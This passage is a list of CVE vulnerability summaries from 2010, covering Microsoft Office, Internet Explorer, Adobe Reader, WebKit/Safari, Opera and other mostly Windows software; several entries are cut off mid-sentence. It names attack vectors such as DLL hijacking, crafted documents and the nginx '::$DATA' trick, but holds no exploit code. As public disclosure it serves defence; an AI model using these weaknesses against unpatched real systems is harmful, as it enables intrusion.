vulnerability in Microsoft Word 2002 SP3 allows remote attackers to execute arbitrary code via a Word document with crafted List Format Override (LFO) records, aka "Word Pointer Vulnerability." [CVE-2010-3216] Microsoft Word 2002 SP3 and Office 2004 for Mac allow remote attackers to execute arbitrary code via a crafted Word document containing bookmarks that trigger use of an invalid pointer and memory corruption, aka "Word Bookmarks Vulnerability." [CVE-2010-3215] Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly handle unspecified return values during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Return Value Vulnerability." [CVE-2010-3214] Stack-based buffer overflow in Microsoft Word 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2010-3213] Cross-site request forgery (CSRF) vulnerability in Microsoft Outlook Web Access (owa/ev.owa) 2007 through SP2 allows remote attackers to hijack the authentication of e-mail users for requests that perform Outlook requests, as demonstrated by setting the auto-forward rule. [CVE-2010-3200] MSO.dll in Microsoft Word 2003 SP3 11.8326.11.8324 allows remote attackers to cause a denial of service (NULL pointer dereference and multiple-instance application crash) via a crafted buffer in a Word document, as demonstrated by word_crash_11.8326.8324_poc.doc. [CVE-2010-3195] Unspecified vulnerability in IBM DB2 9.1 before FP9, 9.5 before FP6, and 9.7 before FP2 on Windows Server 2008 allows attackers to cause a denial of service (trap) via vectors involving "special group and user enumeration." [CVE-2010-3190] Untrusted search path vulnerability in the Microsoft Foundation Class (MFC) Library in Microsoft Visual Studio .NET 2003 SP1 [CVE-2010-3181] Untrusted search path vulnerability in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory. [CVE-2010-3157] Untrusted search path vulnerability in XacRett before 50 allows attackers to execute arbitrary code via a Trojan horse executable file, related to the explorer.exe filename and use of Windows Explorer. [CVE-2010-3148] Untrusted search path vulnerability in Microsoft Visio 2003 SP3 allows local users to gain privileges via a Trojan horse mfc71enu.dll file in the current working directory, as demonstrated by a directory that contains a .vsd, .vdx, .vst, or .vtx file, aka "Microsoft Visio Insecure Library Loading Vulnerability." [CVE-2010-3146] Multiple untrusted search path vulnerabilities in Microsoft Groove 2007 SP2 allow local users to gain privileges via a Trojan horse (1) mso.dll or (2) GroovePerfmon.dll file in the current working directory, as demonstrated by a directory that contains a Groove vCard (.vcg) or Groove Tool Archive (.gta) file, aka "Microsoft Groove Insecure Library Loading Vulnerability." [CVE-2010-3142] Untrusted search path vulnerability in Microsoft Office PowerPoint 2007 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse rpawinet.dll that is located in the same folder as a .odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx file. [CVE-2010-3141] Untrusted search path vulnerability in Microsoft PowerPoint 2010 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse pptimpconv.dll that is located in the same folder as a .odp, .pot, .potm, .potx, .ppa, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, .pwz, .sldm, or .sldx file. [CVE-2010-3131] Untrusted search path vulnerability in Mozilla Firefox before 3.5.12 and 3.6.x before 3.6.9, Thunderbird before 3.0.7 and 3.1.x before 3.1.3, and SeaMonkey before 2.0.7 on Windows XP allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll that is located in the same folder as a .htm, .html, .jtx, .mfp, or .eml file. [CVE-2010-3111] Google Chrome before 6.0.472.53 does not properly mitigate an unspecified flaw in the Windows kernel, which has unknown impact and attack vectors, a different vulnerability than CVE-2010-2897. [CVE-2010-3101] Directory traversal vulnerability in FTPx Corp FTP Explorer 10.5.19.1 for Windows, and probably earlier versions, allows remote FTP servers to write arbitrary files via a "..\" (dot dot backslash) in a filename. [CVE-2010-3069] Stack-based buffer overflow in the (1) sid_parse and (2) dom_sid_parse functions in Samba before 3.5.5 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted Windows Security ID (SID) on a file share. [CVE-2010-3008] Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 on Windows allows local users to gain privileges or cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3007. [CVE-2010-3005] Unspecified vulnerability in HP Operations Agent 7.36 and 8.6 on Windows allows local users to gain privileges via unknown vectors. [CVE-2010-3004] Unspecified vulnerability in HP Operations Agent 7.36 and 8.6 on Windows allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2010-3001] Unspecified vulnerability in an ActiveX control in the Internet Explorer (IE) plugin in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows has unknown impact and attack vectors related to "multiple browser windows." [CVE-2010-3000] Multiple integer overflows in the ParseKnownType function in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows allow remote attackers to execute arbitrary code via crafted (1) HX_FLV_META_AMF_TYPE_MIXEDARRAY or (2) HX_FLV_META_AMF_TYPE_ARRAY data in an FLV file. [CVE-2010-2996] Array index error in RealNetworks RealPlayer 11.0 through 11.1 on Windows allows remote attackers to execute arbitrary code via a malformed header in a RealMedia .IVR file. [CVE-2010-2991] The IICAClient interface in the ICAClient library in the ICA Client ActiveX Object (aka ICO) component in Citrix Online Plug-in for Windows for XenApp & XenDesktop before 12.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted HTML document that triggers the reading of a .ICA file. [CVE-2010-2990] Citrix Online Plug-in for Windows for XenApp & XenDesktop before 11.2, Citrix Online Plug-in for Mac for XenApp & XenDesktop before 11.0, Citrix ICA Client for Linux before 11.100, Citrix ICA Client for Solaris before 8.63, and Citrix Receiver for Windows Mobile before 11.5 allow remote attackers to execute arbitrary code via (1) a crafted HTML document, (2) a crafted .ICA file, or (3) a crafted type field in an ICA graphics packet, related to a "heap offset overflow" issue. [CVE-2010-2897] Google Chrome before 5.0.375.125 does not properly mitigate an unspecified flaw in the Windows kernel, which has unknown impact and attack vectors. [CVE-2010-2890] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-2889] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted font, a different vulnerability than CVE-2010-3626. [CVE-2010-2888] Multiple unspecified vulnerabilities in an ActiveX control in Adobe Reader and Acrobat 8.x before 8.2.5 and 9.x before 9.4 on Windows allow attackers to execute arbitrary code via unknown vectors. [CVE-2010-2884] Adobe Flash Player 10.1.82.76 and earlier on Windows, Mac OS X, Linux, and Solaris and 10.1.92.10 on Android [CVE-2010-2883] Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010. NOTE: some of these details are obtained from third party information. [CVE-2010-2750] Array index error in Microsoft Word 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Word document that triggers memory corruption, aka "Word Index Vulnerability." [CVE-2010-2748] Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly check an unspecified boundary during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Boundary Check Vulnerability." [CVE-2010-2747] Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly handle an uninitialized pointer during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Uninitialized Pointer Vulnerability." [CVE-2010-2734] Cross-site scripting (XSS) vulnerability in the mobile portal in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "XSS Issue on UAG Mobile Portal Website in Forefront Unified Access Gateway Vulnerability." [CVE-2010-2733] Cross-site scripting (XSS) vulnerability in the Web Monitor in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "UAG XSS Allows EOP Vulnerability." [CVE-2010-2732] Open redirect vulnerability in the web interface in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, aka "UAG Redirection Spoofing Vulnerability." [CVE-2010-2730] Buffer overflow in Microsoft Internet Information Services (IIS) 7.5, when FastCGI is enabled, allows remote attackers to execute arbitrary code via crafted headers in a request, aka "Request Header Buffer Overflow Vulnerability." [CVE-2010-2728] Heap-based buffer overflow in Microsoft Outlook 2002 SP3, 2003 SP3, and 2007 SP2, when Online Mode for an Exchange Server is enabled, allows remote attackers to execute arbitrary code via a crafted e-mail message, aka "Heap Based Buffer Overflow in Outlook Vulnerability." [CVE-2010-2703] Stack-based buffer overflow in the execvp_nc function in the ov.dll module in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53, when running on Windows, allows remote attackers to execute arbitrary code via a long HTTP request to webappmon.exe. [CVE-2010-2666] Opera before 10.54 on Windows and Mac OS X does not properly enforce permission requirements for widget filesystem access and directory selection, which allows user-assisted remote attackers to create or modify arbitrary files, and consequently execute arbitrary code, via widget File I/O operations. [CVE-2010-2665] Cross-site scripting (XSS) vulnerability in Opera before 10.54 on Windows and Mac OS X, and before 10.11 on UNIX platforms, allows remote attackers to inject arbitrary web script or HTML via a data: URI, related to incorrect detection of the "opening site." [CVE-2010-2661] Opera before 10.54 on Windows and Mac OS X, and before 10.60 on UNIX platforms, does not properly restrict access to the full pathname of a file selected for upload, which allows remote attackers to obtain potentially sensitive information via unspecified DOM manipulations. [CVE-2010-2660] Opera before 10.54 on Windows and Mac OS X, and before 10.60 on UNIX platforms, does not properly restrict certain uses of homograph characters in domain names, which makes it easier for remote attackers to spoof IDN domains via unspecified choices of characters. [CVE-2010-2659] Opera before 10.50 on Windows, before 10.52 on Mac OS X, and before 10.60 on UNIX platforms makes widget properties accessible to third-party domains, which allows remote attackers to obtain potentially sensitive information via a crafted web site. [CVE-2010-2657] Opera before 10.60 on Windows and Mac OS X does not properly prevent certain double-click operations from running a program located on a web site, which allows user-assisted remote attackers to execute arbitrary code via a crafted web page that bypasses a dialog. [CVE-2010-2594] Multiple cross-site request forgery (CSRF) vulnerabilities in the web management interface in InterSect Alliance Snare Agent 3.2.3 and earlier on Solaris, Snare Agent 3.1.7 and earlier on Windows, Snare Agent 1.5.0 and earlier on Linux and AIX, Snare Agent 1.4 and earlier on IRIX, Snare Epilog 1.5.3 and earlier on Windows, and Snare Epilog 1.2 and earlier on UNIX allow remote attackers to hijack the authentication of administrators for requests that (1) change the password or (2) change the listening port. [CVE-2010-2573] Integer underflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3, PowerPoint Viewer SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint Integer Underflow Causes Heap Corruption Vulnerability." [CVE-2010-2572] Buffer overflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint 95 document, aka "PowerPoint Parsing Buffer Overflow Vulnerability." [CVE-2010-2571] Array index error in pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher 97 file, aka "Memory Corruption Due To Invalid Index Into Array in Pubconv.dll Vulnerability." [CVE-2010-2570] Heap-based buffer overflow in pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3, 2003 SP3, 2007 SP2, and 2010 allows remote attackers to execute arbitrary code via a crafted Publisher file that uses an old file format, aka "Heap Overrun in pubconv.dll Vulnerability." [CVE-2010-2569] pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3, 2003 SP3, and 2007 SP2 does not properly handle an unspecified size field in certain older file formats, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted Publisher file, aka "Size Value Heap Corruption in pubconv.dll Vulnerability." [CVE-2010-2562] Microsoft Office Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Excel file, aka "Excel Memory Corruption Vulnerability." [CVE-2010-2561] Microsoft XML Core Services (aka MSXML) 3.0 does not properly handle HTTP responses, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted response, aka "Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption Vulnerability." [CVE-2010-2560] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Layout Memory Corruption Vulnerability." [CVE-2010-2559] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3671, CVE-2009-3674, CVE-2010-0245, and CVE-2010-0246. [CVE-2010-2558] Race condition in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via vectors related to an object in memory, aka "Race Condition Memory Corruption Vulnerability." [CVE-2010-2557] Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-2556] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-2489] Buffer overflow in Ruby 1.9.x before 1.9.1-p429 on Windows might allow local users to gain privileges via a crafted ARGF.inplace_mode value that is not properly handled when constructing the filenames of the backup files. [CVE-2010-2442] Microsoft Internet Explorer, possibly 8, does not properly restrict focus changes, which allows remote attackers to read keystrokes via "cross-domain IFRAME gadgets." [CVE-2010-2428] Cross-site scripting (XSS) vulnerability in admin_loginok.html in the Administrator web interface in Wing FTP Server for Windows 3.5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted POST request. [CVE-2010-2264] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document. [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI. [CVE-2010-2212] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via a PDF file containing Flash content with a crafted #1023 (3FFh) tag, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, and CVE-2010-2211. [CVE-2010-2211] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, and CVE-2010-2212. [CVE-2010-2210] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-2209] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-2208] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, dereference a heap object after this object's deletion, which allows attackers to execute arbitrary code via unspecified vectors. [CVE-2010-2207] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-2206] Array index error in AcroForm.api in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted GIF image in a PDF file, which bypasses a size check and triggers a heap-based buffer overflow. [CVE-2010-2205] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, access uninitialized memory, which allows attackers to execute arbitrary code via unspecified vectors. [CVE-2010-2204] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors. [CVE-2010-2202] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-2201] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code via a PDF file with crafted Flash content involving the (1) pushstring (0x2C) operator, (2) debugfile (0xF1) operator, and an "invalid pointer vulnerability" that triggers memory corruption, a different vulnerability than CVE-2010-1285 and CVE-2010-2168. [CVE-2010-2168] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code via a PDF file with crafted Flash content, involving the newfunction (0x44) operator and an "invalid pointer vulnerability" that triggers memory corruption, a different vulnerability than CVE-2010-1285 and CVE-2010-2201. [CVE-2010-2157] Unspecified vulnerability in CA ARCserve Backup r11.5 SP4, r12.0 SP2, and r12.5 SP1 on Windows allows local users to obtain sensitive information via unknown vectors. [CVE-2010-2119] Microsoft Internet Explorer 6.0.2900.2180 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid nntp:// URIs. [CVE-2010-2118] Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs. [CVE-2010-2090] The npb_protocol_error function in sna V5router64 in IBM Communications Server for Windows 6.1.3 and Communications Server for AIX (aka CSAIX or CS/AIX) in sna.rte before 6.3.1.2 allows remote attackers to cause a denial of service (daemon crash) via APPC data containing a GDSID variable with a GDS length that is too small. [CVE-2010-2088] ASP.NET in Microsoft .NET 3.5 does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks against the form control via the __VIEWSTATE parameter. [CVE-2010-2085] The default configuration of ASP.NET in Microsoft .NET before 1.1 has a value of FALSE for the EnableViewStateMac property, which allows remote attackers to conduct cross-site scripting (XSS) attacks via the __VIEWSTATE parameter. [CVE-2010-2084] Microsoft ASP.NET 2.0 does not prevent setting the InnerHtml property on a control that inherits from HtmlContainerControl, which allows remote attackers to conduct cross-site scripting (XSS) attacks via vectors related to an attribute. [CVE-2010-2083] Microsoft Dynamics GP has a default value of ACCESS for the system password, which might make it easier for remote authenticated users to bypass intended access restrictions via unspecified vectors. [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. [CVE-2010-2011] Microsoft Dynamics GP uses a substitution cipher to encrypt the system password field and unspecified other fields, which makes it easier for remote authenticated users to obtain sensitive information by decrypting a field's contents. [CVE-2010-1991] Microsoft Internet Explorer 6.0.2900.2180, 7, and 8.0.7600.16385 executes a mail application in situations where an IFRAME element has a mailto: URL in its SRC attribute, which allows remote attackers to cause a denial of service (excessive application launches) via an HTML document with many IFRAME elements. [CVE-2010-1988] Mozilla Firefox 3.6.3 on Windows XP SP3 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly execute arbitrary code via JavaScript code that performs certain string concatenation and substring operations, a different vulnerability than CVE-2009-1571. [CVE-2010-1987] Mozilla Firefox 3.6.3 on Windows XP SP3 allows remote attackers to cause a denial of service (memory consumption, out-of-bounds read, and application crash) via JavaScript code that appends long strings to the content of a P element, and performs certain other string concatenation and substring operations, related to the DoubleWideCharMappedString class in USP10.dll and the gfxWindowsFontGroup::GetUnderlineOffset function in xul.dll, a different vulnerability than CVE-2009-1571. [CVE-2010-1986] Mozilla Firefox 3.6.3 on Windows XP SP3 allows remote attackers to cause a denial of service (memory consumption and application crash) via JavaScript code that creates multiple arrays containing elements with long string values, and then appends long strings to the content of a P element, related to the gfxWindowsFontGroup::MakeTextRun function in xul.dll, a different vulnerability than CVE-2009-1571. [CVE-2010-1971] Cross-site request forgery (CSRF) vulnerability in HP Insight Software Installer for Windows before 6.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors, a different vulnerability than CVE-2010-1968. [CVE-2010-1970] Unspecified vulnerability in HP Insight Software Installer for Windows before 6.1 allows local users to read or modify data, and consequently gain privileges, via unknown vectors. [CVE-2010-1969] Cross-site scripting (XSS) vulnerability in HP Virtual Connect Enterprise Manager for Windows before 6.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2010-1968] Cross-site request forgery (CSRF) vulnerability in HP Insight Software Installer for Windows before 6.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors, a different vulnerability than CVE-2010-1971. [CVE-2010-1967] Unspecified vulnerability in HP Insight Software Installer for Windows before 6.1 allows local users to read or modify data via unknown vectors. [CVE-2010-1966] Unspecified vulnerability in HP Insight Control power management for Windows before 6.1 allows local users to read or modify data, or cause a denial of service, via unknown vectors. [CVE-2010-1965] Unspecified vulnerability in HP Insight Orchestration for Windows before 6.1 allows remote attackers to read or modify data via unknown vectors. [CVE-2010-1940] Apple Safari 4.0.5 on Windows sends the "Authorization: Basic" header appropriate for one web site to a different web site named in a Location header received from the first site, which allows remote web servers to obtain sensitive information by logging HTTP requests. NOTE: the provenance of this information is unknown [CVE-2010-1939] Use-after-free vulnerability in Apple Safari 4.0.5 on Windows allows remote attackers to execute arbitrary code by using window.open to create a popup window for a crafted HTML document, and then calling the parent window's close method, which triggers improper handling of a deleted window object. [CVE-2010-1903] Microsoft Office Word 2002 SP3 and 2003 SP3, and Office Word Viewer, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a malformed record in a Word file, aka "Word HTML Linked Objects Memory Corruption Vulnerability." [CVE-2010-1902] Buffer overflow in Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2010-1901] Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2010-1900] Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2010-1899] Stack consumption vulnerability in the ASP implementation in Microsoft Internet Information Services (IIS) 5.1, 6.0, 7.0, and 7.5 allows remote attackers to cause a denial of service (daemon outage) via a crafted request, related to asp.dll, aka "IIS Repeated Parameter Request Denial of Service Vulnerability." [CVE-2010-1881] The FieldList ActiveX control in the Microsoft Access Wizard Controls in ACCWIZ.dll in Microsoft Office Access 2003 SP3 does not properly interact with the memory-access approach used by Internet Explorer and Office during instantiation, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via an HTML document that references this control along with crafted persistent storage data, aka "ACCWIZ.dll Uninitialized Variable Vulnerability." [CVE-2010-1852] Microsoft Internet Explorer, when the Invisible Hand extension is enabled, uses cookies during background HTTP requests in a possibly unexpected manner, which might allow remote web servers to identify specific persons and their product searches via HTTP request logging, related to a "cross-site data leakage" issue. [CVE-2010-1824] Use-after-free vulnerability in WebKit, as used in Apple iTunes before 10.2 on Windows, Apple Safari, and Google Chrome before 6.0.472.59, allows remote attackers to execute arbitrary code or cause a denial of service via vectors related to SVG styles, the DOM tree, and error messages. [CVE-2010-1805] Untrusted search path vulnerability in Apple Safari 4.x before 4.1.2 and 5.x before 5.0.2 on Windows allows local users to gain privileges via a Trojan horse explorer.exe (aka Windows Explorer) program in a directory containing a file that had been downloaded by Safari. [CVE-2010-1799] Stack-based buffer overflow in the error-logging functionality in Apple QuickTime before 7.6.7 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. [CVE-2010-1796] The AutoFill feature in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to obtain sensitive Address Book Card information via JavaScript code that forces keystroke events for input fields. [CVE-2010-1795] Untrusted search path vulnerability in Apple iTunes before 9.1, when running on Windows 7, Vista, and XP, allows local users and possibly remote attackers to gain privileges via a Trojan horse DLL in the current working directory. [CVE-2010-1793] Multiple use-after-free vulnerabilities in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1792] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1791] Integer signedness error in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving a JavaScript array index. [CVE-2010-1790] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1789] Heap-based buffer overflow in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a JavaScript string object. [CVE-2010-1788] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1787] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1786] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1785] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1784] The counters functionality in the Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1783] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1782] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1780] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1778] Cross-site scripting (XSS) vulnerability in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via an RSS feed. [CVE-2010-1774] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses out-of-bounds memory during processing of HTML tables, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document. [CVE-2010-1771] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving fonts. [CVE-2010-1770] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Apple Safari before 4.1 on Mac OS X 10.4, and Google Chrome before 5.0.375.70 does not properly handle a transformation of a text node that has the IBM1147 character set, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document containing a BR element, related to a "type checking issue." [CVE-2010-1769] WebKit in Apple iTunes before 9.2 on Windows, and Apple iOS before 4 on the iPhone and iPod touch, accesses out-of-bounds memory during the handling of tables, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, a different vulnerability than CVE-2010-1387 and 